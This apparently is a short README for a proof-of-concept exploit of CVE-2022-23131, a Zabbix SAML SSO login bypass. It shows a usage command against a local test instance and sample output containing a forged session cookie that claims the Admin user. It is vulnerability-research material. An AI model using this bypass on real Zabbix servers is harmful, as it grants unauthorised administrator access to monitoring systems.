CVE-2022-23131


Zabbix SAML SSO Login Bypass Vulnerability CVE-2022-23131

Environment and PoC for CVE-2022-23131

Environment

You can set up a Zabbix instance with SAML SSO by following the steps in Zabbix Environment for CVE-2022-23131.

PoC

The PoC is a modified version of the one by jweny.

Usage:

go run poc.go check -t http://localhost:8080 -u Admin

[INFO] 2022/02/24 19:49 vul exist! target: http://localhost:8080, cookie: eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiYmYyMzAxMWU1YWMyOWE1MjFlN2E1ZDZjMTAwZDQ2NjAiLCJzaWduIjoiaytKblhjVjlhQmJRa3NJc21oMVRwVEhrMGFDSTJOYkM1VGNTU1doczQ3YVIrNmpWZ1BKOGw5cWZhZlRmcjA3VGVKalNZcW5kZWRPWEtleklmS0Fjb3c9PSJ9